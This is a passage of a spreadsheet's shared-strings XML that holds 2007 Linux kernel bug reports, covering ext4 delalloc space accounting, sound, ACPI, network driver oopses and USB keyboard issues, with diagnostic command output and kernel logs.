  </si>
  <si>
    <t>ext4</t>
  </si>
  <si>
    <t>2007-11-08 09:42 UTC</t>
  </si>
  <si>
    <t>2008-08-22 12:39 UTC</t>
  </si>
  <si>
    <t>2.6.24-rc1 + ext4 git patch queue from last week or so. It appears that delalloc does not track used space properly, and fails to return ENOSPC as appropriate: [root@bear-05 ~]# mkfs.ext3 -I 256 /dev/sdb7 32768 [root@bear-05 ~]# mount -t ext4dev -o data=writeback,delalloc,extents,mballoc /dev/sdb7 /mnt/test [root@bear-05 ~]# df -h /mnt/test Filesystem Size Used Avail Use% Mounted on /dev/sdb7 30M 4.5M 24M 16% /mnt/test [root@bear-05 ~]# du -h /tmp/1Mfile 1.1M /tmp/1Mfile [root@bear-05 ~]# for I in `seq 1 50`; do cp /tmp/1Mfile /mnt/test/1Mfile-$I; done [root@bear-05 ~]# df -h /mnt/test Filesystem Size Used Avail Use% Mounted on /dev/sdb7 30M 30M 0 100% /mnt/test all resulting files are 1M in length: [root@bear-05 ~]# ls -l /mnt/test/1M* | grep -v 1048576 [root@bear-05 ~]# ls -l /mnt/test/1M* | grep 1048576 | wc -l 50 but many of them have silently dropped data on the floor: [root@bear-05 ~]# du -hc /mnt/test/1Mfile-* | grep -v "1.0M" 596K /mnt/test/1Mfile-26 0 /mnt/test/1Mfile-27 0 /mnt/test/1Mfile-28 0 /mnt/test/1Mfile-29 0 /mnt/test/1Mfile-30 &lt;snip&gt; When mounted with nodelalloc, I get proper behavior: [root@bear-05 ~]# for I in `seq 1 50`; do cp /tmp/1Mfile /mnt/test/1Mfile-$I; done cp: writing `/mnt/test/1Mfile-26': No space left on device cp: writing `/mnt/test/1Mfile-27': No space left on device cp: writing `/mnt/test/1Mfile-28': No space left on device cp: writing `/mnt/test/1Mfile-29': No space left on device &lt;snip&gt;</t>
  </si>
  <si>
    <t>libata: cdrw/dvdrom disabed after s2ram (2.6.24-rc2)</t>
  </si>
  <si>
    <t>2007-11-08 13:19 UTC</t>
  </si>
  <si>
    <t>2007-11-16 15:14 UTC</t>
  </si>
  <si>
    <t>Subject : libata: cdrw/dvdrom disabed after s2ram (2.6.24-rc2) Submitter : Roberto Oppedisano &lt;roppedisano@infracomspa.it&gt; References : http://lkml.org/lkml/2007/11/8/124 Handled-By : Andrew Morton &lt;akpm@linux-foundation.org&gt; Jeff Garzik &lt;jeff@garzik.org&gt; Matthew Garrett &lt;mjg59@srcf.ucam.org&gt; Patch : http://lkml.org/lkml/2007/11/8/167</t>
  </si>
  <si>
    <t>Denys Fedoryshchenko</t>
  </si>
  <si>
    <t>system hangs after a few minutes</t>
  </si>
  <si>
    <t>2007-11-08 23:15 UTC</t>
  </si>
  <si>
    <t>Marcus Better</t>
  </si>
  <si>
    <t>2007-12-17 14:29 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23 Distribution: Debian Hardware Environment: Thinkpad R60, Intel Core 2 Duo Software Environment: x86_64 kernel, XFS, X.org, KDE. Problem Description: When using the system for some time, usually at most a few hours, it suddenly hangs completely, the screen goes black, and it can only be reset with the power switch. The fan is still spinning however and the system seems to generate heat as if it were doing something CPU-intensive. This happens consistently but at seemingly random times. It's a desktop system, used for some browsing and e-mail mostly.</t>
  </si>
  <si>
    <t>snd_hda_intel doesn't mute front speakers when headset is plugged in</t>
  </si>
  <si>
    <t>2007-11-09 05:22 UTC</t>
  </si>
  <si>
    <t>Pablo Yaggi</t>
  </si>
  <si>
    <t>2012-05-17 15:04 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.23 Distribution:Mandriva Cooker Hardware Environment:Vaio VGN-FZ19VN Hi, this bug was fixed in 2.6.23 and come again in 2.6.23.1, when i plugged the headset in the front panel speakers are not mutted, even there's no mixer option to control channels independly. Bests ! here's my lspci: 00:00.0 Host bridge: Intel Corporation Mobile PM965/GM965/GL960 Memory Controller Hub (rev 0c) 00:02.0 VGA compatible controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c) 00:02.1 Display controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c) 00:1a.0 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Contoller #4 (rev 03) 00:1a.1 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #5 (rev 03) 00:1a.7 USB Controller: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #2 (rev 03) 00:1b.0 Audio device: Intel Corporation 82801H (ICH8 Family) HD Audio Controller (rev 03) 00:1c.0 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 1 (rev 03) 00:1c.1 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 2 (rev 03) 00:1c.2 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 3 (rev 03) 00:1c.4 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 5 (rev 03) 00:1d.0 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #1 (rev 03) 00:1d.1 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #2 (rev 03) 00:1d.2 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #3 (rev 03) 00:1d.7 USB Controller: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #1 (rev 03) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev f3) 00:1f.0 ISA bridge: Intel Corporation 82801HEM (ICH8M) LPC Interface Controller (rev 03) 00:1f.1 IDE interface: Intel Corporation 82801HBM/HEM (ICH8M/ICH8M-E) IDE Controller (rev 03) 00:1f.2 SATA controller: Intel Corporation 82801HBM/HEM (ICH8M/ICH8M-E) SATA AHCI Controller (rev 03) 00:1f.3 SMBus: Intel Corporation 82801H (ICH8 Family) SMBus Controller (rev 03) 06:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02) 08:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8036 PCI-E Fast Ethernet Controller (rev 16) 09:03.0 CardBus bridge: Texas Instruments PCIxx12 Cardbus Controller 09:03.1 FireWire (IEEE 1394): Texas Instruments PCIxx12 OHCI Compliant IEEE 1394 Host Controller 09:03.2 Mass storage controller: Texas Instruments 5-in-1 Multimedia Card Reader (SD/MMC/MS/MS PRO/xD)</t>
  </si>
  <si>
    <t>iozone write 50% regression in kernel 2.6.24-rc1</t>
  </si>
  <si>
    <t>2007-11-09 14:20 UTC</t>
  </si>
  <si>
    <t>2007-11-16 15:18 UTC</t>
  </si>
  <si>
    <t>Subject : iozone write 50% regression in kernel 2.6.24-rc1 Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; References : http://lkml.org/lkml/2007/11/9/28 Handled-By : Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Martin Knoblauch &lt;knobi@knobisoft.de</t>
  </si>
  <si>
    <t>2.6.24-rc2 STD with s2disk fails to activate suspended system after loading</t>
  </si>
  <si>
    <t>2007-11-11 10:25 UTC</t>
  </si>
  <si>
    <t>2007-12-07 17:23 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc2 STD with s2disk fails to activate suspended system after loading Submitter : Chris Friedhoff &lt;chris@friedhoff.org&gt; References : http://lkml.org/lkml/2007/11/10/114</t>
  </si>
  <si>
    <t>cd/dvd inaccessible in 2.6.24-rc2</t>
  </si>
  <si>
    <t>2007-11-11 10:36 UTC</t>
  </si>
  <si>
    <t>2007-12-20 15:44 UTC</t>
  </si>
  <si>
    <t>Subject : cd/dvd inaccessible in 2.6.24-rc2 Submitter : Will Trives &lt;will@trivescon.com.au&gt; References : http://lkml.org/lkml/2007/11/9/290 Handled-By : Alan Cox &lt;alan@lxorguk.ukuu.org.uk&gt; Jeff Garzik &lt;jeff@garzik.org&gt;</t>
  </si>
  <si>
    <t>SIGCHLD not waking up sigwait</t>
  </si>
  <si>
    <t>2007-11-11 10:44 UTC</t>
  </si>
  <si>
    <t>2007-11-13 15:17 UTC</t>
  </si>
  <si>
    <t>Roland McGrath</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: ? Distribution: Debian unstable Hardware Environment: i686 SMP (single HyperThreaded CPU) Software Environment: glibc 2.6.1 Problem Description: sigwait() does not wake up upon delivery of SIGCHLD (or perhaps drops SIGCHLD silently??), even though SIGCHLD is properly blocked beforehand. Steps to reproduce: Compile and run the snippet below. It should terminate after a sec, but does not. Note that the problem only seem to occur when NOT debugging; the problem is not reproducible under strace/gdb/ltrace. ----8&lt;--------8&lt;--------8&lt;--------8&lt;---- #include &lt;unistd.h&gt; #include &lt;sys/wait.h&gt; #include &lt;pthread.h&gt; #include &lt;signal.h&gt; #include &lt;stdlib.h&gt; int main (void) { sigset_t set; pid_t pid; int signum; sigemptyset (&amp;set); sigaddset (&amp;set, SIGCHLD); pthread_sigmask (SIG_BLOCK, &amp;set, NULL); if (fork () == 0) { sleep (1); exit (0); } sigwait (&amp;set, &amp;signum); return 0; }</t>
  </si>
  <si>
    <t>x86: show cpuinfo only for online CPUs</t>
  </si>
  <si>
    <t>2007-11-11 10:45 UTC</t>
  </si>
  <si>
    <t>2007-11-18 13:39 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] x86: show cpuinfo only for online CPUs Submitter : "Andreas Herrmann" &lt;andreas.herrmann3@amd.com&gt; References : http://lkml.org/lkml/2007/11/1/207 Handled-By : Glauber de Oliveira Costa &lt;gcosta@redhat.com&gt; "H. Peter Anvin" &lt;hpa@zytor.com&gt; Patch : http://lkml.org/lkml/2007/11/1/246</t>
  </si>
  <si>
    <t>RTNLGRP_ND_USEROPT does not report ifindex</t>
  </si>
  <si>
    <t>2.6.24-rc</t>
  </si>
  <si>
    <t>2007-11-11 10:52 UTC</t>
  </si>
  <si>
    <t>2007-11-19 14:41 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none Distribution: N/A Hardware Environment: any Software Environment: any Problem Description: The RTNLGRP_ND_USEROPT NetLink message introduced in 2.6.24 does not seem to include any information as to which netif the user options come from: struct nduseroptmsg { unsigned char nduseropt_family; unsigned char nduseropt_pad1; unsigned short nduseropt_opts_len; /* Total length of options */ __u8 nduseropt_icmp_type; __u8 nduseropt_icmp_code; unsigned short nduseropt_pad2; /* Followed by one or more ND options */ }; Considering this is meant to carry data that is heavily link-layer involved, this seems like a feature bug. Could an ifindex field be added there?? Steps to reproduce:</t>
  </si>
  <si>
    <t>2.6.24-rc2: Network commit causes SLUB performance regression with tbench</t>
  </si>
  <si>
    <t>2007-11-11 11:12 UTC</t>
  </si>
  <si>
    <t>2007-11-16 15:22 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc2: Network commit causes SLUB performance regression with tbench Submitter : Christoph Lameter &lt;clameter@sgi.com&gt; References : http://lkml.org/lkml/2007/11/9/246 Handled-By : Nick Piggin &lt;nickpiggin@yahoo.com.au&gt;</t>
  </si>
  <si>
    <t>2.6.24-rc1 on PPC64: machine check exception</t>
  </si>
  <si>
    <t>2007-11-11 11:23 UTC</t>
  </si>
  <si>
    <t>2007-11-16 15:24 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc1 on PPC64: machine check exception Submitter : Vaidyanathan Srinivasan &lt;svaidy@linux.vnet.ibm.com&gt; References : http://lkml.org/lkml/2007/11/5/92 Handled-By : Anton Blanchard &lt;anton@samba.org&gt; Patch : http://patchwork.ozlabs.org/linuxppc/patch?id=14475</t>
  </si>
  <si>
    <t>2.6.24-rc1-gb4f5550 oops</t>
  </si>
  <si>
    <t>2.6.24-rc1-gb4f5550</t>
  </si>
  <si>
    <t>2007-11-11 11:28 UTC</t>
  </si>
  <si>
    <t>2007-11-20 00:29 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc1-gb4f5550 oops Submitter : Grant Wilson &lt;grant.wilson@zen.co.uk&gt; References : http://lkml.org/lkml/2007/11/5/6 Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt;</t>
  </si>
  <si>
    <t>ACPI Error attaching device data</t>
  </si>
  <si>
    <t>2007-11-11 18:02 UTC</t>
  </si>
  <si>
    <t>2008-06-13 21:36 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: - Red Hat Enterprise Linux 5 2.6.18-53.el5 - Mainline 2.6.24-rc2 Hardware Environment: HP ProLiant ML115 G1 Servers. BIOS http://h18023.www1.hp.com/support/files/server/us/locate/1145_6371.html Problem Description: ACPI: EC: Look up EC in DSDT ACPI: Interpreter enabled ACPI: (supports S0 S5) ACPI: Using IOAPIC for interrupt routing Error attaching device data &lt;---- here! Error attaching device data ACPI: PCI Root Bridge [PCI0] (0000:00) PCI: Transparent bridge - 0000:00:06.0 ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P1._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.BR10._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.BR11._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.BR12._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.BR15._PRT] #ls /proc/acpi/processor/ P001 P002 # cat /proc/acpi/processor/P001/info processor id: 0 acpi id: 1 bus mastering control: no power management: no throttling control: no limit interface: no # cat /proc/acpi/processor/P002/info processor id: 1 acpi id: 2 bus mastering control: no power management: no throttling control: no limit interface: no Steps to reproduce: Install kernels and then check output of dmesg after boot the machine.</t>
  </si>
  <si>
    <t>CPU_IDLE=y NO_HZ=y hangs at boot - HP nx6125</t>
  </si>
  <si>
    <t>2007-11-12 02:37 UTC</t>
  </si>
  <si>
    <t>Dino Leonardo Sangoi</t>
  </si>
  <si>
    <t>2007-12-03 22:51 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23 Distribution: Fedora Rawhide (almost F8) Hardware Environment: Laptop HP nx6125 Problem Description: see https://bugzilla.redhat.com/show_bug.cgi?id=312201 and http://lkml.org/lkml/2007/11/9/24 for hardware info, boot logs etcetera. I'm creating this bug to add some data requested, without spamming lkml. I will also close the Fedora bug as UPSTREAM, trying to keep all info together. Another interesting info is that sometimes while booting 2.6.24-rc2, I get: Marking TSC unstable due to: TSC halts in idle. Time: acpi_pm clocksource has been installed. Then the kernel halts for a while (seconds or minutes), and then continues. But if I press a key on the keyboard the system continues the boot immediately (as if it has been waiting in idle, and is restarted by an hardware interrupt). Unfortunately the patch sent by Venki Pallipadi (http://lkml.org/lkml/2007/11/9/263) doesn't work. I will attach to this bug the acpi dump (btw, using pmtools-20070714 I get: "ACPI tables were not found. If you know location of RSD PTR table (from dmesg, etc), supply it with either --addr or -a option", so the dump is generated by pmtools-20070511) and the .config used.</t>
  </si>
  <si>
    <t>Major mke2fs slowdown (reproducable, bisected)</t>
  </si>
  <si>
    <t>2007-11-12 12:46 UTC</t>
  </si>
  <si>
    <t>2007-11-13 03:19 UTC</t>
  </si>
  <si>
    <t>Subject : Major mke2fs slowdown (reproducable, bisected) Submitter : Alexey Dobriyan &lt;adobriyan@gmail.com&gt; References : http://lkml.org/lkml/2007/11/12/154 Handled-By : Linus Torvalds &lt;torvalds@linux-foundation.org&gt;</t>
  </si>
  <si>
    <t>The keyboard doesn't work, the computer is very slow</t>
  </si>
  <si>
    <t>2007-11-13 00:52 UTC</t>
  </si>
  <si>
    <t>2007-12-17 15:09 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23.1 Distribution: Gentoo Hardware Environment: x86 (Intel Centrino 1.5 Ghz) Software Environment: Problem Description: Steps to reproduce: Boot the computer and try to type anything Almost everything is explained in the summary. I can't use the keyboard with 2.6.24 release candidates (the problem also occured with 2.6.24-rc1). I use exactly the same configuration used under 2.6.23.1 for input devices but it doesn't work. Does anybody has any clue to solve this annoying problem ?</t>
  </si>
  <si>
    <t>v2.6.24-rc2-409-g9418d5d: attempt to access beyond end of device</t>
  </si>
  <si>
    <t>2.6.24-rc2-409-g9418d5d</t>
  </si>
  <si>
    <t>2007-11-13 13:11 UTC</t>
  </si>
  <si>
    <t>2008-01-02 16:25 UTC</t>
  </si>
  <si>
    <t>Subject : v2.6.24-rc2-409-g9418d5d: attempt to access beyond end of device Submitter : Thomas Meyer &lt;thomas@m3y3r.de&gt; References : http://lkml.org/lkml/2007/11/13/250</t>
  </si>
  <si>
    <t>Reproducable hang with 2.6.24-rc2 using oprofile</t>
  </si>
  <si>
    <t>2007-11-13 13:18 UTC</t>
  </si>
  <si>
    <t>2007-11-20 02:39 UTC</t>
  </si>
  <si>
    <t>Subject : Reproducable hang with 2.6.24-rc2 using oprofile Submitter : Jan Kara &lt;jack@suse.cz&gt; References : http://lkml.org/lkml/2007/11/13/225</t>
  </si>
  <si>
    <t>[ICH7 snd_hda_intel] Volume control broken</t>
  </si>
  <si>
    <t>v2.6.24-rc2-409-g9418d5d</t>
  </si>
  <si>
    <t>2007-11-13 16:56 UTC</t>
  </si>
  <si>
    <t>Frans Pop</t>
  </si>
  <si>
    <t>2007-12-01 13:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23 Distribution: Debian Hardware Environment: x86_64 Pentium D system; ICH7 chipset 00:1b.0 Audio device [0403]: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller [8086:27d8] (rev 01) Software Environment: Debian Unstable, KDE Desktop Problem Description: If I change the volume using the master control slider in KDE, the sound will first go down to a very low volume (almost muted with slider at 2/3 _up_) and then, in about 10 seconds, come slowly back up to its "normal" volume for the position of the slider. The volume does vary while I move the slider, but even at the very top it is very low at first. This only happens with the master slider, the PCM and front sliders behave normally. There were some changes from 2.6.23 to 2.6.24. During first boot of .24 I get: Setting up ALSA...warning: 'alsactl restore' failed with error message ' alsactl: set_control:989: warning: name mismatch (Capture Volume/Input Source) for control #2 alsactl: set_control:991: warning: index mismatch (0/1) for control #2 alsactl: set_control:993: failed to obtain info for control #2 (Operation not permitted)' I also suddenly have a lot more controls (some probably bogus): Output: master, PCM, front, surround, center, LFE, digital, mux, mux Input: capture, capture, digital, mux, mux Also, the rear output jack responds to the "front" output slider, as does the front output jack. Not sure if that is a regression or not; will check. Can provide any additional info needed.</t>
  </si>
  <si>
    <t>uml doesn't work on 2.6.24-rc2</t>
  </si>
  <si>
    <t>2007-11-14 04:34 UTC</t>
  </si>
  <si>
    <t>2007-11-16 15:35 UTC</t>
  </si>
  <si>
    <t>Subject : uml doesn't work on 2.6.24-rc2 Submitter : Miklos Szeredi &lt;miklos@szeredi.hu&gt; References : http://lkml.org/lkml/2007/11/13/469</t>
  </si>
  <si>
    <t>SLOB crash, 2.6.24-rc2</t>
  </si>
  <si>
    <t>2007-11-14 04:51 UTC</t>
  </si>
  <si>
    <t>2007-11-16 15:39 UTC</t>
  </si>
  <si>
    <t>Subject : SLOB crash, 2.6.24-rc2 Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; References : http://lkml.org/lkml/2007/11/14/108</t>
  </si>
  <si>
    <t>setting MTU &gt; 1500 on card "cold" sigsegs the "ip" program and produces an OOPS.</t>
  </si>
  <si>
    <t>VIA Velocity &gt; 1500 MTU cold configure -=&gt; OOPS</t>
  </si>
  <si>
    <t>2007-11-14 19:11 UTC</t>
  </si>
  <si>
    <t>2007-11-15 18:46 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Still occurs on latest openSUSE 10.3 kernel. A brief scan of the git log for this driver does not suggest a fix. Distribution: openSUSE 10.3 Hardware Environment: AMD Athlon XP 2200 Software Environment: kernel 2.6.22.12 Problem Description: setting MTU &gt; 1500 on card "cold" sigsegs the "ip" program and produces an OOPS. Steps to reproduce: 1. have a VIA Velocity gig-e NIC, *cold* (unconfigured but module loaded). 2. Issue: ip link set eth0 up 7200 192.168.1.1 This has been an issue since at least 2.6.18 but I wasn't able to reproduce it on demand for a whole variety of reasons. Now I am able to reproduce it, 100% of the time, on-demand (although this requires a reboot.) BUG: unable to handle kernel NULL pointer dereference at virtual address 00000003 printing eip: f96a7772 *pde = 00000000 Oops: 0000 [#1] SMP last sysfs file: /devices/pci0000:00/0000:00:00.0/class Modules linked in: xt_tcpudp xt_pkttype ipt_LOG xt_limit drbd snd_pcm_oss snd_mixer_oss snd_seq snd_seq_device ipt_REJECT xt_state iptable_mangle iptable_nat nf_nat iptable_filter nf_conntrack_ipv4 nf_conntrack nfnetlink ip_tables ip6_tables x_tables tcp_bic apparmor dm_crypt loop dm_mirror dm_log dm_mod snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm button parport_pc rtc_cmos via_velocity sr_mod cdrom snd_timer rtc_core parport snd crc_ccitt rtc_lib soundcore snd_page_alloc shpchp sis_agp pci_hotplug agpgart i2c_sis630 i2c_sis96x i2c_core sg usbhid hid ff_memless ehci_hcd sd_mod ohci_hcd usbcore piix sis5513 ide_core edd ext3 mbcache jbd fan pata_sis libata scsi_mod thermal processor CPU: 0 EIP: 0060:[&lt;f96a7772&gt;] Tainted: G N VLI EFLAGS: 00010046 (2.6.22.12-0.1-default #1) EIP is at velocity_rx_refill+0x22/0x1d1 [via_velocity] eax: c197a500 ebx: c197a500 ecx: 00000000 edx: df8a9c00 esi: c197a500 edi: 00000000 ebp: 00000000 esp: f774fe84 ds: 007b es: 007b fs: 00d8 gs: 0033 ss: 0068 Process ip (pid: 4133, ti=f774e000 task=f7a31030 task.ti=f774e000) Stack: f774fef0 00000086 3f257025 c170a2a0 00000000 fffffff4 00000200 c197a500 df8a9e00 fffffff4 f96a798f c01d0360 f96a61a7 c197a500 c197a000 00001c20 00000000 f96a8955 00008922 00008922 00000216 c197a000 00000001 00008922 Call Trace: [&lt;f96a798f&gt;] velocity_init_rd_ring+0x6e/0xa0 [via_velocity] [&lt;c01d0360&gt;] __delay+0x6/0x7 [&lt;f96a61a7&gt;] safe_disable_mii_autopoll+0x14/0x26 [via_velocity] [&lt;f96a8955&gt;] velocity_change_mtu+0xbc/0x104 [via_velocity] [&lt;c026e62a&gt;] dev_set_mtu+0x2d/0x5d [&lt;c0270788&gt;] dev_ioctl+0x3b1/0x43e [&lt;c012daa8&gt;] ptrace_notify+0x6a/0x94 [&lt;c026554b&gt;] sock_ioctl+0x19f/0x1be [&lt;c02653ac&gt;] sock_ioctl+0x0/0x1be [&lt;c017a131&gt;] do_ioctl+0x21/0xa0 [&lt;c014dcc0&gt;] audit_syscall_entry+0x105/0x13e [&lt;c017a3e7&gt;] vfs_ioctl+0x237/0x249 [&lt;c017a445&gt;] sys_ioctl+0x4c/0x67 [&lt;c0104ea2&gt;] syscall_call+0x7/0xb ======================= Code: ff 31 c0 5a 5b 5e 5f 5d c3 55 57 56 53 89 c3 83 ec 18 8b a8 f8 00 00 00 c7 44 24 10 00 00 00 00 89 ef c1 e7 04 03 bb 00 01 00 00 &lt;80&gt; 7f 03 00 0f 88 1d 01 00 00 8d 34 ed 00 00 00 00 03 b3 04 01 EIP: [&lt;f96a7772&gt;] velocity_rx_refill+0x22/0x1d1 [via_velocity] SS:ESP 0068:f774fe84</t>
  </si>
  <si>
    <t>scroll wheel on BTC 8193 doesn't work</t>
  </si>
  <si>
    <t>2007-11-15 05:50 UTC</t>
  </si>
  <si>
    <t>Kir Kolyshkin</t>
  </si>
  <si>
    <t>2010-02-23 22:42 UTC</t>
  </si>
  <si>
    <t>Scroll wheel on BTC 8193 keyboard is not working in Linux. On another keyboard (Genius SlimStar Pro) and the scroll wheel works there. When I rotate or click the wheel, nothing happens, nothing is appearing in the relevant /dev/input/eventNN file, nothing bad in dmesg. Here's the hardware info I was able to collect: # dmesg | tail -n 6 usb 1-6.1.2: new low speed USB device using ehci_hcd and address 16 usb 1-6.1.2: configuration #1 chosen from 1 choice input: USB-compliant keyboard as /class/input/input18 input: USB HID v1.10 Keyboard [USB-compliant keyboard] on usb-0000:00:1a.7-6.1.2 input: USB-compliant keyboard as /class/input/input19 input: USB HID v1.10 Device [USB-compliant keyboard] on usb-0000:00:1a.7-6.1.2 # /sbin/lsusb | grep KEY Bus 001 Device 016: ID 0518:0002 EzKEY Corp. # /sbin/lsusb -d 0518:0002 -v Bus 001 Device 016: ID 0518:0002 EzKEY Corp. Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 8 idVendor 0x0518 EzKEY Corp. idProduct 0x0002 bcdDevice 1.00 iManufacturer 0 iProduct 1 USB-compliant keyboard iSerial 0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 59 bNumInterfaces 2 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xa0 Remote Wakeup MaxPower 100mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 3 Human Interface Devices bInterfaceSubClass 1 Boot Interface Subclass bInterfaceProtocol 1 Keyboard iInterface 0 HID Device Descriptor: bLength 9 bDescriptorType 33 bcdHID 1.10 bCountryCode 0 Not supported bNumDescriptors 1 bDescriptorType 34 Report wDescriptorLength 65 Report Descriptors: ** UNAVAILABLE ** Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0008 1x 8 bytes bInterval 10 Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 1 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 3 Human Interface Devices bInterfaceSubClass 1 Boot Interface Subclass bInterfaceProtocol 2 Mouse iInterface 0 HID Device Descriptor: bLength 9 bDescriptorType 33 bcdHID 1.10 bCountryCode 0 Not supported bNumDescriptors 1 bDescriptorType 34 Report wDescriptorLength 50 Report Descriptors: ** UNAVAILABLE ** Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x82 EP 2 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0003 1x 3 bytes bInterval 10 If there is anything else I should report here -- please ask.</t>
  </si>
  <si>
    <t>Ivo van Doorn</t>
  </si>
  <si>
    <t>Netgear GA320T(tg3) strange errors and non-workingness</t>
  </si>
  <si>
    <t>2.6.22.12 (openSUSE 10.3)</t>
  </si>
  <si>
    <t>2007-11-15 18:04 UTC</t>
  </si>
  <si>
    <t>2007-12-12 05:30 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.4.something Distribution: openSUSE 10.3 Hardware Environment: Athlon XP 2200+ Software Environment: 2.6.22.12 Problem Description: this bug is being created from a mailing list discussion. I've got a pair of GiG-E cards that do not work correctly. Everything appears to come up just fine, but sooner or later (typically fairly quickly) the cards weird out and never really come back. The best info I've got is this: Nov 10 22:21:19 frank kernel: tg3.c:v3.65 (August 07, 2006) Nov 10 22:21:19 frank kernel: ACPI: PCI Interrupt 0000:00:0b.0[A] -&gt; Link [LNKB] -&gt; GSI 3 (level, low) -&gt; IRQ 3 Nov 10 22:21:19 frank kernel: eth0: Tigon3 [partno(AC91002A1) rev 0105 PHY(5701)] (PCI:33MHz:32-bit) 10/100/1000BaseT Ethernet 00:09:5b:09:b1:69 Nov 10 22:21:19 frank kernel: eth0: RXcsums[1] LinkChgREG[0] MIirq[0] ASF[0] Split[0] WireSpeed[1] TSOcap[0] Nov 10 22:21:19 frank kernel: eth0: dma_rwctrl[76ff000f] dma_mask[64-bit] Nov 10 22:21:19 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset b (was 164514e4, writing 302a1385) Nov 10 22:21:19 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 3 (was 0, writing 4008) Nov 10 22:21:19 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 2 (was 2000000, writing 2000015) Nov 10 22:21:19 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 1 (was 2b00000, writing 2b00106) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 0 (was 164514e4, writing 3ea173b) Nov 10 22:21:20 frank kernel: tg3: eth0: Link is up at 1000 Mbps, full duplex. Nov 10 22:21:20 frank kernel: tg3: eth0: Flow control is on for TX and on for RX. Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset b (was 164514e4, writing 302a1385) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 3 (was 0, writing 4008) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 2 (was 2000000, writing 2000015) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 1 (was 2b00000, writing 2b00106) Nov 10 22:21:20 frank kernel: PM: Writing back config space on device 0000:00:0b.0 at offset 0 (was 164514e4, writing 3ea173b) Nov 10 22:21:20 frank kernel: ACPI: PCI interrupt for device 0000:00:0b.0 disabled Nov 10 22:21:20 frank kernel: PCI: Enabling device 0000:00:0b.0 (0100 -&gt; 0102) Nov 10 22:21:20 frank kernel: ACPI: PCI Interrupt 0000:00:0b.0[A] -&gt; Link [LNKB] -&gt; GSI 3 (level, low) -&gt; IRQ 3 Nov 10 22:21:20 frank kernel: eth0: Tigon3 [partno(AC91002A1) rev 0105 PHY(5701)] (PCI:33MHz:32-bit) 10/100/1000BaseT Ethernet 00:09:5b:09:b1:69 Nov 10 22:21:20 frank kernel: eth0: RXcsums[1] LinkChgREG[0] MIirq[0] ASF[0] Split[0] WireSpeed[1] TSOcap[0] Nov 10 22:21:20 frank kernel: eth0: 